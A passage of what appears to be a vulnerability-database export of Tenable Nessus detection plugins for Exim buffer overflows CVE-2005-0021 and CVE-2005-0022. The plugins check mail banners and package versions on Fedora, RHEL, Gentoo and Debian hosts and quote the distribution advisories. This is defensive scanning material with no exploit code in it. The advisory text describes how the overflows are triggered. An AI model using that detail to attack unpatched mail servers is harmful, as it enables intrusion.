However, Nessus has not tested for these.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Exim 4.44 or newer\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/07\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:exim:exim\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SMTP problems\");\n\n script_dependencie(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smtp_func.inc\");\n\n#\n# RHEL 4, CentOS 4, and more ship with a (patched) version of exim by default,\n# so a banner version match is not proof of exposure; report only in paranoid mode\n#\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_kb_item(\"Services/smtp\");\nif(!port) port = 25;\nif (! 
get_port_state(port)) exit(0);\n\nbanner = get_smtp_banner(port:port);\nif(!banner)exit(0);\nif ( \"Exim\" >!< banner ) exit(0);\n\nif(egrep(pattern:\"220.*Exim ([0-3]\\.|4\\.([0-9][^0-9]|[0-3][0-9]|4[0-3][^0-9]))\", string:banner))\n security_hole(port);\n\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:19", "bulletinFamily": "scanner", "description": "This erratum fixes two relatively minor security issues which were discovered in Exim in the last few weeks. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2005-0021 and CVE-2005-0022 to these, respectively.\n\n1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication. This code originated in the Samba project. The overflow can be exploited only if you are using SPA authentication.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-19T00:00:00", "id": "FEDORA_2005-001.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16113", "published": "2005-01-07T00:00:00", "title": "Fedora Core 2 : exim-4.43-1.FC2.1 (2005-001)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-001.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16113);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2018/07/19 23:19:04\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"FEDORA\", value:\"2005-001\");\n\n script_name(english:\"Fedora Core 2 : exim-4.43-1.FC2.1 (2005-001)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This erratum fixes two relatively minor security issues which were\ndiscovered in Exim in the last few weeks. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the names\nCVE-2005-0021 and CVE-2005-0022 to these, respectively.\n\n1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication. This code originated in the Samba project. The\noverflow can be exploited only if you are using SPA authentication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-January/000555.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?080b4ac1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-sa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: 
\"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"exim-4.43-1.FC2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"exim-debuginfo-4.43-1.FC2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"exim-doc-4.43-1.FC2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"exim-mon-4.43-1.FC2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"exim-sa-4.43-1.FC2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-doc / exim-mon / exim-sa\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:41", "bulletinFamily": "scanner", "description": "This erratum fixes two relatively minor security issues which were discovered in Exim in the last few weeks. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2005-0021 and CVE-2005-0022 to these, respectively.\n\n1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication. 
This code originated in the Samba project. The overflow can be exploited only if you are using SPA authentication.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-19T00:00:00", "id": "FEDORA_2005-002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62248", "published": "2012-09-24T00:00:00", "title": "Fedora Core 3 : exim-4.43-1.FC3.1 (2005-002)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-002.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62248);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/19 23:19:04\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"FEDORA\", value:\"2005-002\");\n\n script_name(english:\"Fedora Core 3 : exim-4.43-1.FC3.1 (2005-002)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This erratum fixes two relatively minor security issues which were\ndiscovered in Exim in the last few weeks. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the names\nCVE-2005-0021 and CVE-2005-0022 to these, respectively.\n\n1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication. This code originated in the Samba project. 
The\noverflow can be exploited only if you are using SPA authentication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-January/000587.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1811cf14\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-sa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 
audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 3.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC3\", reference:\"exim-4.43-1.FC3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"exim-debuginfo-4.43-1.FC3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"exim-doc-4.43-1.FC3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"exim-mon-4.43-1.FC3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"exim-sa-4.43-1.FC3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-doc / exim-mon / exim-sa\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:24", "bulletinFamily": "scanner", "description": "Updated exim packages that resolve security issues are now available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nExim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet.\n\nA buffer overflow was 
discovered in the spa_base64_to_bits function in Exim, as originally obtained from Samba code. If SPA authentication is enabled, a remote attacker may be able to exploit this vulnerability to execute arbitrary code as the 'exim' user. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-0022 to this issue. Please note that SPA authentication is not enabled by default in Red Hat Enterprise Linux 4.\n\nBuffer overflow flaws were discovered in the host_aton and dns_build_reverse functions in Exim. A local user can trigger these flaws by executing exim with carefully crafted command line arguments and may be able to gain the privileges of the 'exim' account. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-0021 to this issue.\n\nUsers of Exim are advised to update to these erratum packages which contain backported patches to correct these issues.", "modified": "2018-11-15T00:00:00", "id": "REDHAT-RHSA-2005-025.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=17165", "published": "2005-02-22T00:00:00", "title": "RHEL 4 : exim (RHSA-2005:025)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:025. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17165);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 11:40:29\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"RHSA\", value:\"2005:025\");\n\n script_name(english:\"RHEL 4 : exim (RHSA-2005:025)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated exim packages that resolve security issues are now available\nfor Red Hat Enterprise Linux 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nExim is a mail transport agent (MTA) developed at the University of\nCambridge for use on Unix systems connected to the Internet.\n\nA buffer overflow was discovered in the spa_base64_to_bits function in\nExim, as originally obtained from Samba code. If SPA authentication is\nenabled, a remote attacker may be able to exploit this vulnerability\nto execute arbitrary code as the 'exim' user. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2005-0022 to this issue. Please note that SPA authentication\nis not enabled by default in Red Hat Enterprise Linux 4.\n\nBuffer overflow flaws were discovered in the host_aton and\ndns_build_reverse functions in Exim. A local user can trigger these\nflaws by executing exim with carefully crafted command line arguments\nand may be able to gain the privileges of the 'exim' account. 
The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2005-0021 to this issue.\n\nUsers of Exim are advised to update to these erratum packages which\ncontain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-0021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-0022\"\n );\n # http://www.exim.org/mail-archives/exim-users/Week-of-Mon-20050103/msg00028.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1855ef75\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:025\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:exim-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:exim-sa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:025\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"exim-4.43-1.RHEL4.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"exim-doc-4.43-1.RHEL4.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"exim-mon-4.43-1.RHEL4.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", 
reference:\"exim-sa-4.43-1.RHEL4.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-doc / exim-mon / exim-sa\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:22", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200501-23 (Exim: Two buffer overflows)\n\n Buffer overflows have been found in the host_aton() function (CAN-2005-0021) as well as in the spa_base64_to_bits() function (CAN-2005-0022), which is part of the SPA authentication code.\n Impact :\n\n A local attacker could trigger the buffer overflow in host_aton() by supplying an illegal IPv6 address with more than 8 components, using a command line option. The second vulnerability could be remotely exploited during SPA authentication, if it is enabled on the server.\n Both buffer overflows can potentially lead to the execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-08-10T00:00:00", "id": "GENTOO_GLSA-200501-23.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16414", "published": "2005-02-14T00:00:00", "title": "GLSA-200501-23 : Exim: Two buffer overflows", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200501-23.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16414);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/08/10 18:07:05\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"GLSA\", value:\"200501-23\");\n\n script_name(english:\"GLSA-200501-23 : Exim: Two buffer overflows\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200501-23\n(Exim: Two buffer overflows)\n\n Buffer overflows have been found in the host_aton() function\n (CAN-2005-0021) as well as in the spa_base64_to_bits() function\n (CAN-2005-0022), which is part of the SPA authentication code.\n \nImpact :\n\n A local attacker could trigger the buffer overflow in host_aton()\n by supplying an illegal IPv6 address with more than 8 components, using\n a command line option. 
The second vulnerability could be remotely\n exploited during SPA authentication, if it is enabled on the server.\n Both buffer overflows can potentially lead to the execution of\n arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200501-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.43-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.43-r2\"), vulnerable:make_list(\"lt 4.43-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:19", "bulletinFamily": "scanner", "description": "Philip Hazel announced a buffer overflow in the host_aton function in exim-tls, the SSL-enabled version of the default mail-transport-agent in Debian, which can lead to the execution of arbitrary code via an illegal IPv6 address.", "modified": "2018-08-09T00:00:00", "id": "DEBIAN_DSA-637.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16155", "published": "2005-01-13T00:00:00", "title": "Debian DSA-637-1 : exim-tls - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-637. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16155);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2005-0021\");\n script_xref(name:\"DSA\", value:\"637\");\n\n script_name(english:\"Debian DSA-637-1 : exim-tls - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Philip Hazel announced a buffer overflow in the host_aton function in\nexim-tls, the SSL-enabled version of the default mail-transport-agent\nin Debian, which can lead to the execution of arbitrary code via an\nillegal IPv6 address.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=289046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-637\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim-tls package.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-3woody3.\n\nIn the unstable distribution (sid) this package does not exist\nanymore.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim-tls\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/06\");\n script_end_attributes();\n\n 
